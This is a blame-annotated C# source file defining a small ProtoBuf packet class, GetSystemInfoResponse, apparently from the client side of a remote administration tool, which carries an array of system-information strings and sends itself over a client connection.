2014-07-08 12:58:53 +00:00
|
|
|
|
using ProtoBuf;
|
|
|
|
|
|
2015-01-13 18:29:11 +00:00
|
|
|
|
namespace xClient.Core.Packets.ClientPackets
|
2014-07-08 12:58:53 +00:00
|
|
|
|
{
|
|
|
|
|
[ProtoContract]
|
|
|
|
|
public class GetSystemInfoResponse : IPacket
|
|
|
|
|
{
|
|
|
|
|
[ProtoMember(1)]
|
2014-07-18 15:39:19 +00:00
|
|
|
|
public string[] SystemInfos { get; set; }
|
2014-07-08 12:58:53 +00:00
|
|
|
|
|
2015-04-21 18:27:52 +00:00
|
|
|
|
public GetSystemInfoResponse()
|
|
|
|
|
{
|
|
|
|
|
}
|
|
|
|
|
|
2014-07-18 15:39:19 +00:00
|
|
|
|
public GetSystemInfoResponse(string[] systeminfos)
|
2014-07-08 12:58:53 +00:00
|
|
|
|
{
|
2014-07-18 15:39:19 +00:00
|
|
|
|
this.SystemInfos = systeminfos;
|
2014-07-08 12:58:53 +00:00
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
public void Execute(Client client)
|
|
|
|
|
{
|
2015-05-19 01:53:25 +00:00
|
|
|
|
client.Send(this);
|
2014-07-08 12:58:53 +00:00
|
|
|
|
}
|
|
|
|
|
}
|
|
|
|
|
}
|